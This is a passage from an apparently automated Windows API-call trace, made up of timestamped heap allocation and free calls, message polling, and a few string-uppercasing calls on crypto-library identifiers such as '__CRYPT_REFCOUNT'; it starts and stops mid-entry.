hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0193.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0193.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0193.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0193.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0193.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0193.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0193.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0193.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x129c020 [0193.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0193.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0193.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0193.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0193.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0193.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0193.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0193.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0193.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0193.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0193.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0193.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0193.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x13af020 [0193.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x129c020 | out: hHeap=0x970000) returned 1 [0193.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0193.227] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0193.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0193.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0193.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0193.227] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0193.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0193.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0193.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0193.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0193.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0193.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0193.234] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0193.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0193.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0193.235] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0193.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0193.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0193.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0193.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0193.235] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0193.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0193.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0193.235] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0193.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0193.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0193.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0193.236] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0193.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0193.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0193.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0193.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0193.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0193.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0193.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0193.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0193.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0193.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0193.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0193.238] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0193.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0193.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0193.238] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0193.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0193.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0193.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0193.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0193.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0193.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0193.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0193.238] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0193.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0193.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0193.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0193.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0193.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0193.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0193.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0193.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0193.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0193.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0193.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0193.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0193.239] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0193.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0193.239] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0193.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0193.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0193.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0193.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0193.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0193.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0193.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0193.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0193.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0193.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0193.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0193.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0193.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0193.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0193.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x129a020 [0193.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0193.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0193.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x14cf020 [0193.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0193.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0193.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x129a020 | out: hHeap=0x970000) returned 1 [0193.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0193.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0193.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0193.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0193.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0193.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1298020 [0193.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x14cf020 | out: hHeap=0x970000) returned 1 [0193.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0193.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0193.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x14c1020 [0193.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1298020 | out: hHeap=0x970000) returned 1 [0193.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0193.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0193.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0193.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0193.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0193.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0193.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0193.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0193.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0193.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0193.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0193.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0193.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0193.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0193.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0193.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0193.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0193.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0193.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1180020 | out: hHeap=0x970000) returned 1 [0193.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0193.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x107c020 | out: hHeap=0x970000) returned 1 [0193.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0193.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0193.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0193.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0193.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0193.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x13af020 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0193.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf66020 | out: hHeap=0x970000) returned 1 [0193.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0193.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0193.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0193.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0193.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0193.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0193.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0193.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe52020 | out: hHeap=0x970000) returned 1 [0193.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0193.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0193.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe55020 [0193.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x14c1020 | out: hHeap=0x970000) returned 1 [0193.609] HeapFree (in: 